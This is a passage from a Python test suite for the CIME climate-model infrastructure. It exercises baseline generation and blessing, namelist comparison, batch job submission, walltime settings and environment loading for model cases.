time.sleep(120)
kill_subprocesses(sig=signal.SIGTERM)
run_thread.join(timeout=30)
self.assertFalse(run_thread.isAlive(), msg="jenkins_generic_job should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
assert_dashboard_has_build(self, build_name)
###########################################################################
def test_jenkins_generic_job_realistic_dash(self):
###########################################################################
# The actual quality of the cdash results for this test can only
# be inspected manually
# Generate fresh baselines so that this test is not impacted by
# unresolved diffs
self.simple_test(False, "-t cime_test_all -g -b %s" % self._baseline_name)
self.assert_num_leftovers("cime_test_all")
# Should create a diff
os.environ["TESTRUNDIFF_ALTERNATE"] = "True"
# Should create a nml diff
# Modify namelist
fake_nl = """
&fake_nml
fake_item = 'fake'
fake = .true.
/"""
baseline_glob = glob.glob(os.path.join(self._baseline_area, self._baseline_name, "TESTRUNPASS*"))
self.assertEqual(len(baseline_glob), 1, msg="Expected one match, got:\n%s" % "\n".join(baseline_glob))
for baseline_dir in baseline_glob:
nl_path = os.path.join(baseline_dir, "CaseDocs", "datm_in")
self.assertTrue(os.path.isfile(nl_path), msg="Missing file %s" % nl_path)
os.chmod(nl_path, osstat.S_IRUSR | osstat.S_IWUSR)
with open(nl_path, "a") as nl_file:
nl_file.write(fake_nl)
build_name = "jenkins_generic_job_mixed_%s" % CIME.utils.get_timestamp()
self.simple_test(False, "-t cime_test_all -b %s" % self._baseline_name, build_name=build_name)
self.assert_num_leftovers("cime_test_all") # jenkins_generic_job should have automatically cleaned up leftovers from prior run
assert_dashboard_has_build(self, build_name)
###############################################################################
class M_TestCimePerformance(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_cime_case_ctrl_performance(self):
###########################################################################
ts = time.time()
num_repeat = 5
for _ in range(num_repeat):
self._create_test(["cime_tiny","--no-build"])
elapsed = time.time() - ts
print("Perf test result: {:0.2f}".format(elapsed))
###############################################################################
class T_TestRunRestart(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_run_restart(self):
###########################################################################
driver = CIME.utils.get_cime_default_driver()
if driver == "mct":
walltime="00:15:00"
else:
walltime="00:30:00"
self._create_test(["--walltime "+walltime,"NODEFAIL_P1.f09_g16.X"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"{}.{}".format(CIME.utils.get_full_test_name("NODEFAIL_P1.f09_g16.X", machine=self._machine, compiler=self._compiler), self._baseline_name))
rundir = run_cmd_no_fail("./xmlquery RUNDIR --value", from_dir=casedir)
fail_sentinel = os.path.join(rundir, "FAIL_SENTINEL")
self.assertTrue(os.path.exists(fail_sentinel), msg="Missing %s" % fail_sentinel)
self.assertEqual(open(fail_sentinel, "r").read().count("FAIL"), 3)
###########################################################################
def test_run_restart_too_many_fails(self):
###########################################################################
driver = CIME.utils.get_cime_default_driver()
if driver == "mct":
walltime="00:15:00"
else:
walltime="00:30:00"
self._create_test(["--walltime "+walltime,"NODEFAIL_P1.f09_g16.X"], test_id=self._baseline_name, env_changes="NODEFAIL_NUM_FAILS=5", run_errors=True)
casedir = os.path.join(self._testroot,
"{}.{}".format(CIME.utils.get_full_test_name("NODEFAIL_P1.f09_g16.X", machine=self._machine, compiler=self._compiler), self._baseline_name))
rundir = run_cmd_no_fail("./xmlquery RUNDIR --value", from_dir=casedir)
fail_sentinel = os.path.join(rundir, "FAIL_SENTINEL")
self.assertTrue(os.path.exists(fail_sentinel), msg="Missing %s" % fail_sentinel)
self.assertEqual(open(fail_sentinel, "r").read().count("FAIL"), 4)
###############################################################################
class Q_TestBlessTestResults(TestCreateTestCommon):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
TestCreateTestCommon.setUp(self)
# Set a restrictive umask so we can test that SharedAreas used for
# recording baselines are working
restrictive_mask = 0o027
self._orig_umask = os.umask(restrictive_mask)
###########################################################################
def tearDown(self):
###########################################################################
TestCreateTestCommon.tearDown(self)
if "TESTRUNDIFF_ALTERNATE" in os.environ:
del os.environ["TESTRUNDIFF_ALTERNATE"]
os.umask(self._orig_umask)
###############################################################################
def test_bless_test_results(self):
###############################################################################
# Generate some baselines
test_name = "TESTRUNDIFF_P1.f19_g16_rx1.A"
if CIME.utils.get_model() == "e3sm":
genargs = ["-g", "-o", "-b", self._baseline_name, test_name]
compargs = ["-c", "-b", self._baseline_name, test_name]
else:
genargs = ["-g", self._baseline_name, "-o", test_name,
"--baseline-root ", self._baseline_area]
compargs = ["-c", self._baseline_name, test_name,
"--baseline-root ", self._baseline_area]
self._create_test(genargs)
# Hist compare should pass
self._create_test(compargs)
# Change behavior
os.environ["TESTRUNDIFF_ALTERNATE"] = "True"
# Hist compare should now fail
test_id = "%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
self._create_test(compargs, test_id=test_id, run_errors=True)
# compare_test_results should detect the fail
cpr_cmd = "{}/compare_test_results --test-root {} -t {} 2>&1" \
.format(TOOLS_DIR, TEST_ROOT, test_id)
output = run_cmd_assert_result(self, cpr_cmd, expected_stat=CIME.utils.TESTS_FAILED_ERR_CODE)
# use regex
expected_pattern = re.compile(r'FAIL %s[^\s]* BASELINE' % test_name)
the_match = expected_pattern.search(output)
self.assertNotEqual(the_match, None,
msg="Cmd '%s' failed to display failed test in output:\n%s" % (cpr_cmd, output))
# Bless
run_cmd_no_fail("{}/bless_test_results --test-root {} --hist-only --force -t {}"
.format(TOOLS_DIR, TEST_ROOT, test_id))
# Hist compare should now pass again
self._create_test(compargs)
verify_perms(self, self._baseline_area)
###############################################################################
def test_rebless_namelist(self):
###############################################################################
# Generate some namelist baselines
test_to_change = "TESTRUNPASS_P1.f19_g16_rx1.A"
if CIME.utils.get_model() == "e3sm":
genargs = ["-n", "-g", "-o", "-b", self._baseline_name, "cime_test_only_pass"]
compargs = ["-n", "-c", "-b", self._baseline_name, "cime_test_only_pass"]
else:
genargs = ["-n", "-g", self._baseline_name, "-o", "cime_test_only_pass"]
compargs = ["-n", "-c", self._baseline_name, "cime_test_only_pass"]
self._create_test(genargs)
# Basic namelist compare
test_id = "%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
self._create_test(compargs, test_id=test_id)
# Check standalone case.cmpgen_namelists
casedir = os.path.join(self._testroot,
"%s.C.%s" % (CIME.utils.get_full_test_name(test_to_change, machine=self._machine, compiler=self._compiler), test_id))
run_cmd_assert_result(self, "./case.cmpgen_namelists", from_dir=casedir)
# compare_test_results should pass
cpr_cmd = "{}/compare_test_results --test-root {} -n -t {} 2>&1" \
.format(TOOLS_DIR, TEST_ROOT, test_id)
output = run_cmd_assert_result(self, cpr_cmd)
# use regex
expected_pattern = re.compile(r'PASS %s[^\s]* NLCOMP' % test_to_change)
the_match = expected_pattern.search(output)
self.assertNotEqual(the_match, None,
msg="Cmd '%s' failed to display passed test in output:\n%s" % (cpr_cmd, output))
# Modify namelist
fake_nl = """
&fake_nml
fake_item = 'fake'
fake = .true.
/"""
baseline_area = self._baseline_area
baseline_glob = glob.glob(os.path.join(baseline_area, self._baseline_name, "TEST*"))
self.assertEqual(len(baseline_glob), 3, msg="Expected three matches, got:\n%s" % "\n".join(baseline_glob))
for baseline_dir in baseline_glob:
nl_path = os.path.join(baseline_dir, "CaseDocs", "datm_in")
self.assertTrue(os.path.isfile(nl_path), msg="Missing file %s" % nl_path)
os.chmod(nl_path, osstat.S_IRUSR | osstat.S_IWUSR)
with open(nl_path, "a") as nl_file:
nl_file.write(fake_nl)
# Basic namelist compare should now fail
test_id = "%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
self._create_test(compargs, test_id=test_id, pre_run_errors=True)
casedir = os.path.join(self._testroot,
"%s.C.%s" % (CIME.utils.get_full_test_name(test_to_change, machine=self._machine, compiler=self._compiler), test_id))
run_cmd_assert_result(self, "./case.cmpgen_namelists", from_dir=casedir, expected_stat=100)
# preview namelists should work
run_cmd_assert_result(self, "./preview_namelists", from_dir=casedir)
# This should still fail
run_cmd_assert_result(self, "./case.cmpgen_namelists", from_dir=casedir, expected_stat=100)
# compare_test_results should fail
cpr_cmd = "{}/compare_test_results --test-root {} -n -t {} 2>&1" \
.format(TOOLS_DIR, TEST_ROOT, test_id)
output = run_cmd_assert_result(self, cpr_cmd, expected_stat=CIME.utils.TESTS_FAILED_ERR_CODE)
# use regex
expected_pattern = re.compile(r'FAIL %s[^\s]* NLCOMP' % test_to_change)
the_match = expected_pattern.search(output)
self.assertNotEqual(the_match, None,
msg="Cmd '%s' failed to display passed test in output:\n%s" % (cpr_cmd, output))
# Bless
run_cmd_no_fail("{}/bless_test_results --test-root {} -n --force -t {}"
.format(TOOLS_DIR, TEST_ROOT, test_id))
# Basic namelist compare should now pass again
self._create_test(compargs)
verify_perms(self, self._baseline_area)
class X_TestQueryConfig(unittest.TestCase):
def test_query_compsets(self):
run_cmd_no_fail("{}/query_config --compsets".format(SCRIPT_DIR))
def test_query_components(self):
run_cmd_no_fail("{}/query_config --components".format(SCRIPT_DIR))
def test_query_grids(self):
run_cmd_no_fail("{}/query_config --grids".format(SCRIPT_DIR))
def test_query_machines(self):
run_cmd_no_fail("{}/query_config --machines".format(SCRIPT_DIR))
###############################################################################
class Z_FullSystemTest(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_full_system(self):
###########################################################################
# Put this inside any test that's slow
if (FAST_ONLY):
self.skipTest("Skipping slow test")
self._create_test(["--walltime=0:15:00", "cime_developer"], test_id=self._baseline_name)
run_cmd_assert_result(self, "%s/cs.status.%s" % (self._testroot, self._baseline_name),
from_dir=self._testroot)
# Ensure that we can get test times
test_statuses = glob.glob(os.path.join(self._testroot, "*%s" % self._baseline_name, "TestStatus"))
for test_status in test_statuses:
test_time = CIME.wait_for_tests.get_test_time(os.path.dirname(test_status))
self.assertIs(type(test_time), int, msg="get time did not return int for %s" % test_status)
self.assertTrue(test_time > 0, msg="test time was zero for %s" % test_status)
# Test that re-running works
tests = get_tests.get_test_suite("cime_developer", machine=self._machine, compiler=self._compiler)
for test in tests:
casedir = os.path.join(TEST_ROOT, "%s.%s" % (test, self._baseline_name))
# Subtle issue: The run phases of these tests will be in the PASS state until
# the submitted case.test script is run, which could take a while if the system is
# busy. This potentially leaves a window where the wait_for_tests command below will
# not wait for the re-submitted jobs to run because it sees the original PASS.
# The code below forces things back to PEND to avoid this race condition. Note
# that we must use the MEMLEAK phase, not the RUN phase, because RUN being in a non-PEND
# state is how system tests know they are being re-run and must reset certain
# case settings.
if self._hasbatch:
with TestStatus(test_dir=casedir) as ts:
ts.set_status(MEMLEAK_PHASE, TEST_PEND_STATUS)
run_cmd_assert_result(self, "./case.submit --skip-preview-namelist", from_dir=casedir)
self._wait_for_tests(self._baseline_name)
###############################################################################
class K_TestCimeCase(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_cime_case(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1.f19_g16_rx1.A"], test_id=self._baseline_name)
self.assertEqual(type(MACHINE.get_value("MAX_TASKS_PER_NODE")), int)
self.assertTrue(type(MACHINE.get_value("PROJECT_REQUIRED")) in [type(None) , bool])
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=False) as case:
build_complete = case.get_value("BUILD_COMPLETE")
self.assertFalse(build_complete,
msg="Build complete had wrong value '%s'" %
build_complete)
case.set_value("BUILD_COMPLETE", True)
build_complete = case.get_value("BUILD_COMPLETE")
self.assertTrue(build_complete,
msg="Build complete had wrong value '%s'" %
build_complete)
case.flush()
build_complete = run_cmd_no_fail("./xmlquery BUILD_COMPLETE --value",
from_dir=casedir)
self.assertEqual(build_complete, "TRUE",
msg="Build complete had wrong value '%s'" %
build_complete)
# Test some test properties
self.assertEqual(case.get_value("TESTCASE"), "TESTRUNPASS")
def _batch_test_fixture(self, testcase_name):
if not MACHINE.has_batch_system() or NO_BATCH:
self.skipTest("Skipping testing user prerequisites without batch systems")
testdir = os.path.join(TEST_ROOT, testcase_name)
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = "--case {name} --script-root {testdir} --compset X --res f19_g16 --handle-preexisting-dirs=r --output-root {testdir}".format(name=testcase_name, testdir=testdir)
if CIME.utils.get_cime_default_driver() == 'nuopc':
args += " --run-unsupported"
run_cmd_assert_result(self, "{}/create_newcase {}".format(SCRIPT_DIR, args),
from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
return testdir
###########################################################################
def test_cime_case_prereq(self):
###########################################################################
testcase_name = 'prereq_test'
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
if case.get_value("depend_string") is None:
self.skipTest("Skipping prereq test, depend_string was not provided for this batch system")
job_name = "case.run"
prereq_name = 'prereq_test'
batch_commands = case.submit_jobs(prereq=prereq_name, job=job_name, skip_pnl=True, dry_run=True)
self.assertTrue(isinstance(batch_commands, collections.Sequence), "case.submit_jobs did not return a sequence for a dry run")
self.assertTrue(len(batch_commands) > 0, "case.submit_jobs did not return any job submission string")
# The first element in the internal sequence should just be the job name
# The second one (batch_cmd_index) should be the actual batch submission command
batch_cmd_index = 1
# The prerequisite should be applied to all jobs, though we're only expecting one
for batch_cmd in batch_commands:
self.assertTrue(isinstance(batch_cmd, collections.Sequence), "case.submit_jobs did not return a sequence of sequences")
self.assertTrue(len(batch_cmd) > batch_cmd_index, "case.submit_jobs returned internal sequences with length <= {}".format(batch_cmd_index))
self.assertTrue(isinstance(batch_cmd[1], six.string_types), "case.submit_jobs returned internal sequences without the batch command string as the second parameter: {}".format(batch_cmd[1]))
batch_cmd_args = batch_cmd[1]
jobid_ident = "jobid"
dep_str_fmt = case.get_env('batch').get_value('depend_string', subgroup=None)
self.assertTrue(jobid_ident in dep_str_fmt, "dependency string doesn't include the jobid identifier {}".format(jobid_ident))
dep_str = dep_str_fmt[:dep_str_fmt.index(jobid_ident)]
prereq_substr = None
while dep_str in batch_cmd_args:
dep_id_pos = batch_cmd_args.find(dep_str) + len(dep_str)
batch_cmd_args = batch_cmd_args[dep_id_pos:]
prereq_substr = batch_cmd_args[:len(prereq_name)]
if prereq_substr == prereq_name:
break
self.assertTrue(prereq_name in prereq_substr, "Dependencies added, but not the user specified one")
###########################################################################
def test_cime_case_allow_failed_prereq(self):
###########################################################################
testcase_name = 'allow_failed_prereq_test'
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
depend_allow = case.get_value("depend_allow_string")
if depend_allow is None:
self.skipTest("Skipping allow_failed_prereq test, depend_allow_string was not provided for this batch system")
job_name = "case.run"
prereq_name = "prereq_allow_fail_test"
depend_allow = depend_allow.replace("jobid", prereq_name)
batch_commands = case.submit_jobs(prereq=prereq_name, allow_fail=True, job=job_name, skip_pnl=True, dry_run=True)
self.assertTrue(isinstance(batch_commands, collections.Sequence), "case.submit_jobs did not return a sequence for a dry run")
num_submissions = 1
if case.get_value("DOUT_S"):
num_submissions = 2
self.assertTrue(len(batch_commands) == num_submissions, "case.submit_jobs did not return any job submission strings")
self.assertTrue(depend_allow in batch_commands[0][1])
###########################################################################
def test_cime_case_resubmit_immediate(self):
###########################################################################
testcase_name = 'resubmit_immediate_test'
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
depend_string = case.get_value("depend_string")
if depend_string is None:
self.skipTest("Skipping resubmit_immediate test, depend_string was not provided for this batch system")
depend_string = re.sub('jobid.*$','',depend_string)
job_name = "case.run"
num_submissions = 6
case.set_value("RESUBMIT", num_submissions - 1)
batch_commands = case.submit_jobs(job=job_name, skip_pnl=True, dry_run=True, resubmit_immediate=True)
self.assertTrue(isinstance(batch_commands, collections.Sequence), "case.submit_jobs did not return a sequence for a dry run")
if case.get_value("DOUT_S"):
num_submissions = 12
self.assertTrue(len(batch_commands) == num_submissions, "case.submit_jobs did not return {} submitted jobs".format(num_submissions))
for i, cmd in enumerate(batch_commands):
if i > 0:
self.assertTrue(depend_string in cmd[1])
###########################################################################
def test_cime_case_st_archive_resubmit(self):
###########################################################################
testcase_name = "st_archive_resubmit_test"
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
case.case_setup(clean=False, test_mode=False, reset=True)
orig_resubmit = 2
case.set_value("RESUBMIT", orig_resubmit)
case.case_st_archive(resubmit=False)
new_resubmit = case.get_value("RESUBMIT")
self.assertTrue(orig_resubmit == new_resubmit, "st_archive resubmitted when told not to")
case.case_st_archive(resubmit=True)
new_resubmit = case.get_value("RESUBMIT")
self.assertTrue((orig_resubmit - 1) == new_resubmit, "st_archive did not resubmit when told to")
###########################################################################
def test_cime_case_build_threaded_1(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1x1.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1x1.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=False) as case:
build_threaded = case.get_value("SMP_PRESENT")
self.assertFalse(build_threaded)
build_threaded = case.get_build_threaded()
self.assertFalse(build_threaded)
case.set_value("FORCE_BUILD_SMP", True)
build_threaded = case.get_build_threaded()
self.assertTrue(build_threaded)
###########################################################################
def test_cime_case_build_threaded_2(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1x2.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1x2.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=False) as case:
build_threaded = case.get_value("SMP_PRESENT")
self.assertTrue(build_threaded)
build_threaded = case.get_build_threaded()
self.assertTrue(build_threaded)
###########################################################################
def test_cime_case_mpi_serial(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_Mmpi-serial_P10.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_Mmpi-serial_P10.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=True) as case:
# Serial cases should not be using pnetcdf
self.assertEqual(case.get_value("CPL_PIO_TYPENAME"), "netcdf")
# Serial cases should be using 1 task
self.assertEqual(case.get_value("TOTALPES"), 1)
self.assertEqual(case.get_value("NTASKS_CPL"), 1)
###########################################################################
def test_cime_case_force_pecount(self):
###########################################################################
self._create_test(["--no-build", "--force-procs=16", "--force-threads=8", "TESTRUNPASS.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P16x8.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=True) as case:
self.assertEqual(case.get_value("NTASKS_CPL"), 16)
self.assertEqual(case.get_value("NTHRDS_CPL"), 8)
###########################################################################
def test_cime_case_xmlchange_append(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1x1.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1x1.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange --id PIO_CONFIG_OPTS --val='-opt1'", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery --value PIO_CONFIG_OPTS", from_dir=casedir)
self.assertEqual(result, "-opt1")
run_cmd_assert_result(self, "./xmlchange --id PIO_CONFIG_OPTS --val='-opt2' --append", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery --value PIO_CONFIG_OPTS", from_dir=casedir)
self.assertEqual(result, "-opt1 -opt2")
###########################################################################
def test_cime_case_test_walltime_mgmt_1(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "0:10:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch")
###########################################################################
def test_cime_case_test_walltime_mgmt_2(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P64.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "03:00:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch")
###########################################################################
def test_cime_case_test_walltime_mgmt_3(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P64.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), "--walltime=0:10:00", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "0:10:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch") # Not smart enough to select faster queue
###########################################################################
def test_cime_case_test_walltime_mgmt_4(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P1.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), "--walltime=2:00:00", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "2:00:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch")
###########################################################################
def test_cime_case_test_walltime_mgmt_5(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P1.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange JOB_QUEUE=slartibartfast --subgroup=case.test", from_dir=casedir, expected_stat=1)
run_cmd_assert_result(self, "./xmlchange JOB_QUEUE=slartibartfast --force --subgroup=case.test", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "03:00:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "slartibartfast")
###########################################################################
def test_cime_case_test_walltime_mgmt_6(self):
###########################################################################
if not self._hasbatch:
self.skipTest("Skipping walltime test. Depends on batch system")
test_name = "ERS_P1.f19_g16_rx1.A"
self._create_test(["--no-build", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange JOB_WALLCLOCK_TIME=421:32:11 --subgroup=case.test", from_dir=casedir)
run_cmd_assert_result(self, "./case.setup --reset", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
with Case(casedir) as case:
walltime_format = case.get_value("walltime_format", subgroup=None)
if walltime_format is not None and walltime_format.count(":") == 1:
self.assertEqual(result, "421:32")
else:
self.assertEqual(result, "421:32:11")
###########################################################################
def test_cime_case_test_walltime_mgmt_7(self):
###########################################################################
if not self._hasbatch:
self.skipTest("Skipping walltime test. Depends on batch system")
test_name = "ERS_P1.f19_g16_rx1.A"
self._create_test(["--no-build", "--walltime=01:00:00", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange JOB_WALLCLOCK_TIME=421:32:11 --subgroup=case.test", from_dir=casedir)
run_cmd_assert_result(self, "./case.setup --reset", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
with Case(casedir) as case:
walltime_format = case.get_value("walltime_format", subgroup=None)
if walltime_format is not None and walltime_format.count(":") == 1:
self.assertEqual(result, "421:32")
else:
self.assertEqual(result, "421:32:11")
###########################################################################
def test_cime_case_test_custom_project(self):
###########################################################################
test_name = "ERS_P1.f19_g16_rx1.A"
machine, compiler = "melvin", "gnu" # have to use a machine both models know and one that doesn't put PROJECT in any key paths
self._create_test(["--no-setup", "--machine={}".format(machine), "--compiler={}".format(compiler), "--project=testproj", test_name],
test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery --value PROJECT --subgroup=case.test", from_dir=casedir)
self.assertEqual(result, "testproj")
###########################################################################
def test_create_test_longname(self):
###########################################################################
self._create_test(["SMS.f19_g16.2000_SATM_XLND_SICE_SOCN_XROF_XGLC_SWAV", "--no-build"])
###########################################################################
def test_env_loading(self):
###########################################################################
if self._machine != "melvin":
self.skipTest("Skipping env load test - Only works on melvin")
self._create_test(["--no-build", "TESTRUNPASS.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=True) as case:
env_mach = case.get_env("mach_specific")
orig_env = dict(os.environ)
env_mach.load_env(case)
module_env = dict(os.environ)
os.environ.clear()
os.environ.update(orig_env)
env_mach.load_env(case, force_method="generic")
generic_env = dict(os.environ)
os.environ.clear()
os.environ.update(orig_env)
problems = ""
for mkey, mval in module_env.items():
if mkey not in generic_env:
if not mkey.startswith("PS") and mkey != "OLDPWD":
problems += "Generic missing key: {}\n".format(mkey)
elif mval != generic_env[mkey] and mkey not in ["_", "SHLVL", "PWD"] and not mkey.endswith("()"):
problems += "Value mismatch for key {}: {} != {}\n".format(mkey, repr(mval), repr(generic_env[mkey]))
for gkey in generic_env.keys():
if gkey not in module_env:
problems += "Modules missing key: {}\n".format(gkey)
self.assertEqual(problems, "", msg=problems)
###########################################################################
def test_case_submit_interface(self):
###########################################################################
try:
import imp
except ImportError:
print("imp not found, skipping case.submit interface test")
return
# the current directory may not exist, so make sure we are in a real directory
os.chdir(os.getenv("HOME"))
sys.path.append(TOOLS_DIR)
case_submit_path = os.path.join(TOOLS_DIR, "case.submit")
